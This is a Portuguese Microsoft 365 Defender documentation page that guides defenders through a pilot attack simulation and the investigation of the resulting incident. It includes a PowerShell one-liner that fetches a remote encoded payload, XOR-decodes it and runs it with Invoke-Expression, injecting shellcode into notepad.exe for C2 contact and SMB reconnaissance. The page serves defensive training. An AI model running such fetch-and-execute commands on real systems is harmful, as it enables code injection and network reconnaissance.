Executar uma simulação de ataque em um ambiente Microsoft 365 Defender piloto

Este artigo é a Etapa 1 de 2 no processo de execução de uma investigação e resposta de um incidente em Microsoft 365 Defender usando um ambiente piloto. Para obter mais informações sobre esse processo, consulte o artigo visão geral.

Depois de preparar seu ambiente piloto,é hora de testar a resposta a incidentes do Microsoft 365 Defender e os recursos automatizados de investigação e correção criando um incidente com um ataque simulado e usando o portal Microsoft 365 Defender para investigar e responder.

Um incidente na Microsoft 365 Defender é uma coleção de alertas correlacionados e dados associados que comentam a história de um ataque.

Os serviços e aplicativos do Microsoft 365 criam alertas quando detectam um evento ou atividade suspeito ou mal-intencionado. Alertas individuais fornecem dicas valiosas sobre um ataque concluído ou contínuo. No entanto, os ataques geralmente empregam várias técnicas contra diferentes tipos de entidades, como dispositivos, usuários e caixas de correio. O resultado são vários alertas para várias entidades em seu locatário.

Observação

Se você for novo na análise de segurança e na resposta a incidentes, consulte o passo a passo Responder ao seu primeiro incidente para obter uma visita guiada de um processo típico de análise, correção e revisão pós-incidente.

Simular ataques com Microsoft 365 Defender portal

O Microsoft 365 Defender portal tem recursos integrados para criar ataques simulados em seu ambiente piloto:

Defender para treinamento Office 365 simulação de ataque

O Defender para Office 365 com Microsoft 365 E5 ou o Microsoft Defender para Office 365 Plano 2 inclui treinamento de simulação de ataque para ataques de phishing. As etapas básicas são:

  1. Criar uma simulação

    Para obter instruções passo a passo sobre como criar e enviar uma nova simulação, consulte Simular um ataque de phishing.

  2. Criar uma carga

    Para obter instruções passo a passo sobre como criar uma carga para uso em uma simulação, consulte Create a custom payload for Attack simulation training.

  3. Obter informações

    Para obter instruções passo a passo sobre como obter informações com relatórios, consulte Obter informações por meio do treinamento de simulação de ataque.

Para obter mais informações, consulte Simulations.

Tutoriais de ataque do Defender para Ponto de Extremidade & simulações

Aqui estão as simulações do Defender para Ponto de Extremidade da Microsoft:

  • Documento solta backdoor
  • Investigação automatizada (backdoor)

Há simulações adicionais de IQ de Ataque e SafeBreach. Também há um conjunto de tutoriais.

Para cada simulação ou tutorial:

  1. Baixe e leia o documento de passagem correspondente fornecido com sua simulação ou cenário selecionado.

  2. Baixe o arquivo de simulação. Você pode optar por baixar o arquivo ou o script no dispositivo de teste, mas ele não é obrigatório.

  3. Execute o arquivo de simulação ou o script no dispositivo de teste conforme instruído no documento de passagem.

Para obter mais informações, consulte Experience Microsoft Defender for Endpoint through simulated attack.

Simular um ataque com um controlador de domínio isolado e um dispositivo cliente (opcional)

Neste exercício opcional de resposta a incidentes, você simulará um ataque a um controlador de domínio isolado dos Serviços de Domínio do Active Directory (AD DS) e um dispositivo Windows usando um script do PowerShell e investigará, correção e resolverá o incidente.

Primeiro, você precisa adicionar pontos de extremidade ao seu ambiente piloto.

Adicionar pontos de extremidade do ambiente piloto

Primeiro, você precisa adicionar um controlador de domínio do AD DS isolado e um dispositivo Windows ao seu ambiente piloto.

  1. Verifique se o locatário do ambiente piloto habilitar Microsoft 365 Defender.

  2. Verifique se o controlador de domínio:

  3. Verifique se seu dispositivo de teste:

Se você usar grupos de locatários e dispositivos, crie um grupo de dispositivos dedicado para o dispositivo de teste e pressione-o para o nível superior.

Uma alternativa é hospedar o controlador de domínio do AD DS e o dispositivo de teste como máquinas virtuais em serviços Microsoft Azure infraestrutura. Você pode usar as instruções na Fase 1 doGuia de Laboratório de Teste empresarial simulado , mas ignore a criação da máquina virtual APP1.

Aqui está o resultado.

Pontos de extremidade para seu ambiente de avaliação do Defender usando o Guia de Laboratório de Teste da empresa simulado.

Você simula um ataque sofisticado que utiliza técnicas avançadas para ocultar da detecção. O ataque enumera sessões SMB (Bloqueio de Mensagens do Servidor) abertas em controladores de domínio e recupera endereços IP recentes dos dispositivos dos usuários. Essa categoria de ataques geralmente não inclui arquivos descartados no dispositivo da vítima e eles ocorrem apenas na memória. Eles "vivem da terra" usando o sistema e as ferramentas administrativas existentes e injetam seu código em processos do sistema para ocultar sua execução. Esse comportamento permite que eles evadam a detecção e persistam no dispositivo.

Nesta simulação, nosso cenário de exemplo começa com um script do PowerShell. No mundo real, um usuário pode ser complicado para executar um script ou o script pode ser executado de uma conexão remota com outro computador de um dispositivo infectado anteriormente, o que indica que o invasor está tentando se mover lateralmente na rede. A detecção desses scripts pode ser difícil porque os administradores também costumam executar scripts remotamente para realizar várias atividades administrativas.

Ataque do PowerShell sem arquivo com injeção de processo e diagrama de ataque de reconnaisance SMB.

Durante a simulação, o ataque injeta o shellcode em um processo aparentemente inocêncio. O cenário requer o uso de notepad.exe. Escolhemos esse processo para a simulação, mas os invasores provavelmente direcionariam um processo de sistema de longa duração, como svchost.exe. Em seguida, o shellcode entra em contato com o servidor de comando e controle (C2) do invasor para receber instruções sobre como prosseguir. O script tenta executar consultas de reconhecimento no controlador de domínio (DC). O reconhecimento permite que um invasor receba informações sobre informações de logon recentes do usuário. Depois que os invasores têm essas informações, eles podem se mover lateralmente na rede para chegar a uma conta sensível específica

Importante

Para obter resultados ideais, siga as instruções de simulação de ataque o mais próximo possível.

Executar a simulação de ataque de controlador de domínio isolado do AD DS

Para executar a simulação de cenário de ataque:

  1. Verifique se seu ambiente piloto inclui o controlador de domínio isolado do AD DS e Windows dispositivo.

  2. Entre no dispositivo de teste com a conta de usuário de teste.

  3. Abra uma Windows PowerShell no dispositivo de teste.

  4. Copie o seguinte script de simulação:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
    = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
    -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
    $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
    $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
    

    Observação

    Se você abrir este artigo em um navegador da Web, poderá encontrar problemas para copiar o texto completo sem perder determinados caracteres ou introduzir quebras de linha extras. Se esse for o caso, baixe este documento e abra-o no Adobe Reader.

  5. Colar e executar o script copiado na janela do PowerShell.

Observação

Se você estiver executando o PowerShell usando o protocolo de área de trabalho remota (RDP), use o comando Texto da Área de Transferência de Tipo no cliente RDP porque a tecla de atalho CTRL-V ou o método clique com o botão direito do mouse pode não funcionar. As versões recentes do PowerShell às vezes também não aceitarão esse método, talvez seja preciso copiar para Bloco de notas memória primeiro, copiá-lo na máquina virtual e, em seguida, colar no PowerShell.

Alguns segundos depois, o aplicativo Bloco de notas será aberto. Um código de ataque simulado será injetado no Bloco de notas. Mantenha a instância Bloco de notas gerada automaticamente aberta para experimentar o cenário completo.

O código de ataque simulado tentará se comunicar com um endereço IP externo (simulando o servidor C2) e tentará reconhecimento contra o controlador de domínio por meio de SMB.

Você verá essa mensagem exibida no console do PowerShell quando este script for concluído:

ran NetSessionEnum against [DC Name] with return code result 0

Para ver o recurso Incidente Automatizado e Resposta em ação, mantenha o processo notepad.exe aberto. Você verá Incidente Automatizado e Resposta interromper o processo de Bloco de notas.

Investigar o incidente do ataque simulado

Observação

Antes de passar por essa simulação, assista ao vídeo a seguir para ver como o gerenciamento de incidentes ajuda você a reunir os alertas relacionados como parte do processo de investigação, onde você pode encontrá-lo no portal e como ele pode ajudá-lo em suas operações de segurança:

Mudando para o ponto de vista do analista SOC, agora você pode começar a investigar o ataque no Microsoft 365 Defender portal.

  1. Abra o Microsoft 365 Defender portal.

  2. No painel de navegação, selecione Incidentes & Alertas > Incidentes.

  3. O novo incidente do ataque simulado aparecerá na fila de incidentes.

    Exemplo da fila de incidentes.

Investigar o ataque como um único incidente

Microsoft 365 Defender correlaciona a análise e agrega todos os alertas e investigações relacionados de diferentes produtos em uma entidade de incidente. Ao fazer isso, Microsoft 365 Defender uma história de ataque mais ampla, permitindo que o analista soc entenda e responda a ameaças complexas.

Os alertas gerados durante essa simulação são associados à mesma ameaça e, como resultado, são automaticamente agregados como um único incidente.

Para exibir o incidente:

  1. Abra o Microsoft 365 Defender portal.

  2. No painel de navegação, selecione Incidentes & Alertas > Incidentes.

  3. Selecione o item mais recente clicando no círculo localizado à esquerda do nome do incidente. Um painel lateral exibe informações adicionais sobre o incidente, incluindo todos os alertas relacionados. Cada incidente tem um nome exclusivo que o descreve com base nos atributos dos alertas que ele inclui.

    Os alertas mostrados no painel podem ser filtrados com base em recursos de serviço: Microsoft Defender para Identidade, Microsoft Defender para Aplicativos na Nuvem, Microsoft Defender para Ponto de Extremidade, Microsoft 365 Defender e Microsoft Defender para Office 365.

  4. Selecione Abrir página de incidentes para obter mais informações sobre o incidente.

    Na página Incidente, você pode ver todos os alertas e informações relacionadas ao incidente. As informações incluem as entidades e ativos envolvidos no alerta, a fonte de detecção dos alertas (como o Microsoft Defender para Identidade ou o Microsoft Defender para Ponto de Extremidade) e o motivo pelo qual eles foram vinculados juntos. Analisar a lista de alertas de incidentes mostra a progressão do ataque. Neste ponto de vista, você pode ver e investigar os alertas individuais.

    Você também pode clicar em Gerenciar incidentes no menu à direita, para marcar o incidente, atribuí-lo a si mesmo e adicionar comentários.

Revisar alertas gerados

Vamos ver alguns dos alertas gerados durante o ataque simulado.

Observação

Vamos passar por apenas alguns dos alertas gerados durante o ataque simulado. Dependendo da versão do Windows e dos produtos Microsoft 365 Defender em execução em seu dispositivo de teste, você pode ver mais alertas que aparecem em uma ordem ligeiramente diferente.

Exemplo dos alertas gerados.

Alerta: injeção de processo suspeito observada (Fonte: Microsoft Defender para Ponto de Extremidade)

Invasores avançados usam métodos sofisticados e furtivos para persistir na memória e se ocultar das ferramentas de detecção. Uma técnica comum é operar de dentro de um processo de sistema confiável, em vez de um executável mal-intencionado, tornando difícil para as ferramentas de detecção e as operações de segurança detectarem o código mal-intencionado.

Para permitir que os analistas soc detectem esses ataques avançados, os sensores de memória profunda no Microsoft Defender para Ponto de Extremidade fornecem ao nosso serviço de nuvem visibilidade sem precedentes em uma variedade de técnicas de injeção de código entre processos. A figura a seguir mostra como o Defender for Endpoint detectou e alertou sobre a tentativa de injetar código notepad.exe.

Exemplo do alerta para injeção de código potencialmente mal-intencionado.

Alerta: comportamento inesperado observado por um processo executado sem argumentos de linha de comando (Fonte: Microsoft Defender para Ponto de Extremidade)

As detecções do Microsoft Defender para Ponto de Extremidade geralmente visam o atributo mais comum de uma técnica de ataque. Esse método garante a durabilidade e eleva a barra para que os invasores alternem para táticas mais novas.

Empregamos algoritmos de aprendizado em larga escala para estabelecer o comportamento normal de processos comuns em uma organização e em todo o mundo e observar quando esses processos mostram comportamentos anômalos. Esses comportamentos anômalos geralmente indicam que o código estranho foi introduzido e está sendo executado em um processo confiável de outra forma.

Para esse cenário, o processo notepad.exe está exibindo comportamento anormal, envolvendo a comunicação com um local externo. Esse resultado é independente do método específico usado para introduzir e executar o código mal-intencionado.

Observação

Como esse alerta é baseado em modelos de aprendizado de máquina que exigem processamento de back-end adicional, pode levar algum tempo antes de você ver esse alerta no portal.

Observe que os detalhes do alerta incluem o endereço IP externo, um indicador que você pode usar como pivô para expandir a investigação.

Selecione o endereço IP na árvore de processo de alerta para exibir a página de detalhes do endereço IP.

Exemplo do alerta para comportamento inesperado por um processo executado sem argumentos de linha de comando.

A figura a seguir exibe a página de detalhes do Endereço IP selecionado (clicando no endereço IP na árvore de processo alerta).

Exemplo da página detalhes do endereço IP.

Alerta: Reconhecimento de usuário e endereço IP (SMB) (Fonte: Microsoft Defender para Identidade)

A enumeração usando o protocolo SMB (Bloqueio de Mensagens do Servidor) permite que os invasores recebam informações de logon de usuário recentes que os ajudam a mover lateralmente pela rede para acessar uma conta sensível específica.

Nessa detecção, um alerta é disparado quando a enumeração de sessão SMB é executado em um controlador de domínio.

Exemplo do alerta do Microsoft Defender for Identity para reconhecimento de endereço IP e usuário.

Analisar a linha do tempo do dispositivo com o Microsoft Defender para Ponto de Extremidade

Depois de explorar os vários alertas neste incidente, navegue de volta para a página de incidentes investigada anteriormente. Selecione a guia Dispositivos na página incidente para revisar os dispositivos envolvidos neste incidente conforme relatado pelo Microsoft Defender para Ponto de Extremidade e o Microsoft Defender para Identidade.

Selecione o nome do dispositivo em que o ataque foi conduzido, para abrir a página da entidade para esse dispositivo específico. Nessa página, você pode ver alertas que foram disparados e eventos relacionados.

Selecione a guia Linha do Tempo para abrir a linha do tempo do dispositivo e exibir todos os eventos e comportamentos observados no dispositivo em ordem cronológica, intercalados com os alertas gerados.

Exemplo da linha do tempo do dispositivo com comportamentos.

Expandir alguns dos comportamentos mais interessantes fornece detalhes úteis, como árvores de processo.

Por exemplo, role para baixo até encontrar o evento de alerta Injeção de processo suspeito observada. Selecione o powershell.exe injetado para notepad.exe processo abaixo dele, para exibir a árvore de processo completa para esse comportamento no gráfico entidades de evento no painel lateral. Use a barra de pesquisa para filtragem, se necessário.

Exemplo da árvore de processos do comportamento de criação de arquivo do PowerShell selecionado.

Analisar as informações do usuário com o Microsoft Defender para Aplicativos na Nuvem

Na página incidente, selecione a guia Usuários para exibir a lista de usuários envolvidos no ataque. A tabela contém informações adicionais sobre cada usuário, incluindo a pontuação de Prioridade de Investigação de cada usuário.

Selecione o nome de usuário para abrir a página de perfil do usuário onde uma investigação posterior pode ser conduzida. Leia mais sobre a investigação de usuários arriscados.

Exemplo da página de usuário do Defender para Aplicativos na Nuvem.

Investigação e correção automatizadas

Observação

Antes de passar por essa simulação, assista ao vídeo a seguir para se familiarizar com o que é a auto-recuperação automatizada, onde encontrá-la no portal e como ela pode ajudar em suas operações de segurança:

Navegue até o incidente no portal Microsoft 365 Defender portal. A guia Investigações na página Incidente mostra as investigações automatizadas que foram disparadas pelo Microsoft Defender for Identity e pelo Microsoft Defender para Ponto de Extremidade. A captura de tela abaixo exibe apenas a investigação automatizada disparada pelo Defender para Ponto de Extremidade. Por padrão, o Defender para Ponto de Extremidade remedia automaticamente os artefatos encontrados na fila, o que requer correção.

Exemplo das investigações automatizadas relacionadas ao incidente.

Selecione o alerta que disparou uma investigação para abrir a página Detalhes da Investigação. Você verá os seguintes detalhes:

  • Alertas que dispararam a investigação automatizada.
  • Usuários e dispositivos afetados. Se os indicadores são encontrados em dispositivos adicionais, esses dispositivos adicionais também serão listados.
  • Lista de evidências. As entidades encontradas e analisadas, como arquivos, processos, serviços, drivers e endereços de rede. Essas entidades são analisadas para possíveis relações com o alerta e classificadas como benignas ou mal-intencionadas.
  • Ameaças encontradas. Ameaças conhecidas encontradas durante a investigação.

Observação

Dependendo do tempo, a investigação automatizada ainda pode estar em execução. Aguarde alguns minutos para que o processo seja concluído antes de coletar e analisar as evidências e revisar os resultados. Atualize a página Detalhes da Investigação para obter as descobertas mais recentes.

Exemplo da página Detalhes da Investigação.

Durante a investigação automatizada, o Microsoft Defender para Ponto de Extremidade identificou o processo de notepad.exe, que foi injetado como um dos artefatos que exigem correção. O Defender para Ponto de Extremidade interrompe automaticamente a injeção de processo suspeito como parte da correção automatizada.

Você pode ver notepad.exe da lista de processos em execução no dispositivo de teste.

Resolver o incidente

Após a conclusão da investigação e confirmação da correção, você resolve o incidente.

Na página Incidente, selecione Gerenciar incidente. De definir o status como Resolver incidente e selecione Alerta true para a classificação e teste de segurança para a determinação.

Exemplo da página incidentes com o painel Gerenciar incidentes aberto, onde você pode clicar na opção para resolver incidentes.

Quando o incidente é resolvido, ele resolve todos os alertas associados no portal Microsoft 365 Defender e nos portais relacionados.

Isso encerra a simulação de ataque para análise de incidentes, investigação automatizada e resolução de incidentes.

Próxima etapa

Experimente Microsoft 365 Defender recursos de resposta a incidentes.

Etapa 2 de 2: tente Microsoft 365 Defender de resposta a incidentes

Criar o ambiente de Microsoft 365 Defender de Avaliação